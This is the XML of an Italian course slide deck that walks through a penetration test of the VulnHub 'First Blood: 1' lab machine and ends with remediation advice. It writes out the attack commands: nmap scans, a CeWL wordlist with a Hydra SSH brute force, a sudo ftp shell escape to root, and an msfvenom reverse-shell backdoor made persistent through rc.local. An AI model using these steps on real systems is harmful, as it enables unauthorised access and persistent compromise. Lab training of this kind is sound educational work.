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5" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="257" r:id="rId37"/>
    <p:sldId id="25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8C41699-2A8C-474B-92F4-056DE942A9AE}">
          <p14:sldIdLst>
            <p14:sldId id="256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5"/>
            <p14:sldId id="296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337" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72" d="100"/>
        </p:scale>
        <p:origin x="20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EDA65-66F5-4C8A-91F9-30C8B0A9D6FF}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>08/01/2021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1CAF3-2286-4DFB-A9CD-FB17F7E1C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86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18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51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082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6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598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129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836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16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779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753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58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476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85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966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68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050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766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431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627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764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190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59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091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17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2710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2075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657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34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7944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1172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15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74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02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21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14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03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1CAF3-2286-4DFB-A9CD-FB17F7E1CFF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11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gtfobins.github.io/gtfobins/ftp/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/firstblood-1,564/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.simplified.guide/ssh/copy-fil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sh.com/ssh/command/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45233" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2018-16843/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.80091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0C95E-0898-4323-9574-4BA6CDAB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Penetration Testing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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177320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manuale delle vulnerabilità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4"/>
            <a:ext cx="8596668" cy="489846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Servizio OpenSSH 7.6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667F57-8058-4590-833D-9D16384C2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26201"/>
            <a:ext cx="8400405" cy="36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1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automatica delle vulnerabilità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4"/>
            <a:ext cx="8596668" cy="489846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OpenVAS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774B4F-5ADC-4514-8A15-A48A20A4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1"/>
            <a:ext cx="7861639" cy="40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automatica delle vulnerabilità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3"/>
            <a:ext cx="8596668" cy="852073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Nikto2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Comando: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nikto -h 10.0.2.11 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5625D0-C5F2-441D-A2C0-C5492263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2292626"/>
            <a:ext cx="8400404" cy="323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8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83501" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Analisi automatica delle vulnerabilità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3"/>
            <a:ext cx="8596668" cy="852073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Directory /johnnyrambo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CAE39E-8469-41D3-995F-3C99D365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82066"/>
            <a:ext cx="882451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0C95E-0898-4323-9574-4BA6CDAB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Target Exploitation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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216280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4607339"/>
            <a:ext cx="8596668" cy="1126435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Proviamo un attacco di forza bruta!!!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695794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Nessun exploit sfruttabile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Servizio SSH sulla porta 60022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User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: johnny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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Informazioni acquisite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369848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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attacco di forza bruta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3"/>
            <a:ext cx="8596668" cy="852073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Generazione dizionario – CeWL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Comando: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cewl -w dizionario.txt -d 1 -m 5 http://10.0.2.11/johnnyrambo/ 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F63453-B008-418C-A227-25393681B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162603"/>
            <a:ext cx="8983502" cy="53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0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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Attacco di forza bruta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3"/>
            <a:ext cx="8596668" cy="852073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Hydra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Comando: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hydra -l johnny -P dizionario.txt -v 10.0.2.11 ssh -s 60022 -t 4 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50C0FE8-C155-479D-B25A-672002D9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616706"/>
            <a:ext cx="8707065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25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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Accesso remoto alla macchina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3"/>
            <a:ext cx="8596668" cy="852073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SSH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Comando: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ssh johnny@10.0.2.11 -p 60022 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7A0BCB-894D-438D-8509-0FC81BBA4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460970"/>
            <a:ext cx="7446250" cy="35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58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0C95E-0898-4323-9574-4BA6CDAB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Privilege Escalation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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161075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Target Discovery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Enumeration Target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Vulnerability Mapping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Target Exploitation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Privilege Escalation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Maintaining Access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Report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297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695794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Nessun exploit sfruttabile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Navighiamo nella directory (cd e ls)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Troviamo file Readme.txt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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Privilege Escalation 1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20C0CEF-D0AA-485D-8F00-58FB3DD97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12487"/>
            <a:ext cx="8660766" cy="10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0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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Privilege Escalation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3"/>
            <a:ext cx="8596668" cy="852073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SSH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Comando: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ssh blood@10.0.2.11 -p 60022 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A95CF61-AEE2-4A5F-9AC8-2AA674F49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640113"/>
            <a:ext cx="7525763" cy="355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7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59" y="1422400"/>
            <a:ext cx="8596668" cy="485913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Troviamo file Readme.txt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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Privilege Escalation 2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2F5E3B-5AC5-4D2E-B860-459E9D87E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9" y="1908313"/>
            <a:ext cx="8493424" cy="1181369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1DC868F-B55C-4098-AFE2-FA56895E0559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692059" y="3332638"/>
            <a:ext cx="8596668" cy="48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Accediamo alla directory /home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00A55B-958E-4322-ABE0-135D8B4B5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59" y="4079035"/>
            <a:ext cx="4091455" cy="10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0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59" y="1422400"/>
            <a:ext cx="8596668" cy="485913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Leggiamo README_FIRST.txt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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Privilege Escalation 2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1DC868F-B55C-4098-AFE2-FA56895E0559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692059" y="2943087"/>
            <a:ext cx="8596668" cy="48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Comando: ls -l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090BA1-6F1B-470E-AB81-A294B013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1" y="1873352"/>
            <a:ext cx="8730551" cy="1006881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0B14A12-EF51-4243-92FF-CBC725559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71" y="3334275"/>
            <a:ext cx="4277322" cy="885949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FFD484E8-6663-4094-994F-3D17FEAB6830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671047" y="4300160"/>
            <a:ext cx="8596668" cy="48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Comando: sudo -l</a:t>
            </a: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3624B3-356D-4C84-80E2-1113BC1A5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59" y="4720851"/>
            <a:ext cx="7482430" cy="14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5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59" y="1422400"/>
            <a:ext cx="8596668" cy="485913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sudo -u sly /bin/cat /home/sly/README.txt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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Privilege Escalation 2</a:t>
            </a:r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476ECF0-C718-4B17-AC36-F495F52A6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9" y="1772098"/>
            <a:ext cx="8865496" cy="261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1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59" y="1422400"/>
            <a:ext cx="8596668" cy="485913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ssh sly@10.0.2.11 -p 60022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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Privilege Escalation 2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1DC868F-B55C-4098-AFE2-FA56895E0559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546284" y="5853043"/>
            <a:ext cx="8596668" cy="48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36A469-71CF-42F7-A125-C035BF7CB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9" y="2082800"/>
            <a:ext cx="6821924" cy="45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61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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Privilege Escalation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3"/>
            <a:ext cx="8596668" cy="852073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sudo -l</a:t>
            </a:r>
          </a:p>
          <a:p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6647A90-188A-42A4-A3C7-88F5FD7E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66590"/>
            <a:ext cx="7173326" cy="1476581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8D6F4E5B-BF1E-4B2A-868D-D516AD495441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571315" y="3514830"/>
            <a:ext cx="8596668" cy="85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sudo -u root /usr/bin/ftp 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!/bin/sh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99BDB5D-3EC1-4633-9731-26565000E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366903"/>
            <a:ext cx="5857279" cy="17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47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0C95E-0898-4323-9574-4BA6CDAB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Maintaining Access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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2894664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Operating System Backdoor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3"/>
            <a:ext cx="8596668" cy="1090611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Generate Backdoor – Msfvenom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Comando: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msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf -o shell.elf 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72DEEAA-D122-4D31-B0AF-15F0816A3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54839"/>
            <a:ext cx="8778742" cy="1214299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5C35D35-83EC-491E-9713-20905EC97D12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="4163009"/>
            <a:ext cx="8596668" cy="46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Creiamo script in.sh</a:t>
            </a:r>
          </a:p>
          <a:p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C30C2D1-1C95-4C24-A9A5-493B81BAF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499594"/>
            <a:ext cx="6302529" cy="155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69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Operating System Backdoor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3"/>
            <a:ext cx="8596668" cy="1090611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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scp leobonny97@10.0.2.15:shell.elf /etc/init.d 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scp leobonny97@10.0.2.15:in.sh /etc/init.d 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4A547A-28C7-43E2-8A02-CA1E51F3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62117"/>
            <a:ext cx="8596668" cy="14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4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0C95E-0898-4323-9574-4BA6CDAB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Target Discovery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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365062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Operating System Backdoor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3"/>
            <a:ext cx="8596668" cy="1090611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 /etc/rc.local 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modifichiamo rc.local</a:t>
            </a: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85259B-7C27-4ED1-8589-59894478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75390"/>
            <a:ext cx="4667890" cy="26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5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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Operating System Backdoor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4"/>
            <a:ext cx="8596668" cy="454508"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Eseguiamo generico modulo handler su Kali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482EAD-711C-4061-B058-44A1A7B61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2063407"/>
            <a:ext cx="8651577" cy="2899532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46455793-7E38-42BB-95AE-0646040BE1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586038" y="5190919"/>
            <a:ext cx="8596668" cy="1126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Siamo in ascolto!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3034277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83501" cy="662609"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Operating System Backdoor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4"/>
            <a:ext cx="8596668" cy="454508"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Riavviamo la macchina target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46455793-7E38-42BB-95AE-0646040BE1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586038" y="5190919"/>
            <a:ext cx="8596668" cy="1126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Abbiamo instaurato una connessione!!!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22DCE66-BE09-404E-9BC7-B21AB5E18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63407"/>
            <a:ext cx="8856528" cy="19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29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0C95E-0898-4323-9574-4BA6CDAB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Report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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2768280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2082800"/>
            <a:ext cx="8596668" cy="267693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Vulnerabilità del servizio nginx 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Vulnerabilità del servizio SSH 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TCP Timestamp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Recupero di credenziali di accesso all’interno di file e pagine Web.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Utilizzo di password deboli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Esecuzione comandi di sistema con i permessi di altri utenti o dell’utente root.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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Ricapitolazione vulnerabilità</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1691728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2082799"/>
            <a:ext cx="8596668" cy="3761409"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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ggiornare la versione di nginx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Aggiornare la versione di OpenSSH; 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isabilitare il TCP timestamp; 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imuovere le credenziali di accesso all’interno di file e pagine Web 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U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tilizzare password complesse</a:t>
            </a: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Non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permettere ad utenti di eseguire comandi di sistema con i permessi di altri utenti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9FD9FEB-AC84-4DA8-B739-312814A74FAB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Possibili soluzioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3428382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Slide del corso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Macchina target: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https://www.vulnhub.com/entry/firstblood-1,564/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CVE-2018-16843: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4"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/cve/CVE-2018-16843/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CVE-2018-15473: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5"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/45233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SSH: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6"/>
              </a:rPr>
              <a:t>https://www.ssh.com/ssh/command/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SSH Upload File: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7"/>
              </a:rPr>
              <a:t>https://www.simplified.guide/ssh/copy-file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GTFOBins ftp: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8"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/ftp/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TCP Timestamp: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9"/>
              </a:rPr>
              <a:t>http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.80091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3036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0C95E-0898-4323-9574-4BA6CDAB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22419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indirizzo IP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4"/>
            <a:ext cx="8596668" cy="489846"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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nmap -sP 10.0.2.0/24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844F23-B346-4FF5-8BF1-3F8BCBB8B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94506"/>
            <a:ext cx="7083392" cy="40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0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Individuazione sistema operativo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4"/>
            <a:ext cx="8596668" cy="489846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nmap -O 10.0.2.11 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F040D6D-B818-4192-BBF9-E352DDFF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51653"/>
            <a:ext cx="7749367" cy="32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8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0C95E-0898-4323-9574-4BA6CDAB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Enumeration Target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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267228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Scanning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4"/>
            <a:ext cx="8596668" cy="489846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nmap -sV -p- 10.0.2.11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FAA272B-0206-464E-B843-EA214E87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56290"/>
            <a:ext cx="8663612" cy="26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6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0C95E-0898-4323-9574-4BA6CDAB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Vulnerability Mapping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181A17-6E82-45EE-8F10-261806085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First Blood: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266946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8FCB5-A182-4F30-88C2-AA1182DA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manuale delle vulnerabilità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A5D14E-36EC-416A-A0AF-C6299BC5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554"/>
            <a:ext cx="8596668" cy="489846"/>
          </a:xfrm>
        </p:spPr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Servizio nginx 1.14.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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E9183EE-4EE0-499A-A11C-E617B124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46852"/>
            <a:ext cx="8662844" cy="327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9579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672</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>162</Paragraphs>
  <Slides>37</Slides>
  <Notes>37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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Sfaccettatura</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>Sommario</vt:lpstr>
      <vt:lpstr>Target Discovery</vt:lpstr>
      <vt:lpstr>Individuazione indirizzo IP</vt:lpstr>
      <vt:lpstr>Individuazione sistema operativo</vt:lpstr>
      <vt:lpstr>Enumeration Target</vt:lpstr>
      <vt:lpstr>Port Scanning</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Analisi manuale delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Analisi manuale delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Analisi automatica delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Analisi automatica delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Analisi automatica delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Proviamo un attacco di forza bruta!!!</vt:lpstr>
      <vt:lpstr>Attacco di forza bruta</vt:lpstr>
      <vt:lpstr>Attacco di forza bruta</vt:lpstr>
      <vt:lpstr>Accesso remoto alla macchina</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Privilege Escalation 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Privilege Escalation 3</vt:lpstr>
      <vt:lpstr>Maintaining Access</vt:lpstr>
      <vt:lpstr>Operating System Backdoor</vt:lpstr>
      <vt:lpstr>Operating System Backdoor</vt:lpstr>
      <vt:lpstr>Operating System Backdoor</vt:lpstr>
      <vt:lpstr>Operating System Backdoor</vt:lpstr>
      <vt:lpstr>Operating System Backdoor</vt:lpstr>
      <vt:lpstr>Report</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Riferimenti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Benny</dc:creator>
  <cp:lastModifiedBy>Benny</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-06T12:29:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-08T18:37:46Z</dcterms:modified>
</cp:coreProperties>
</file>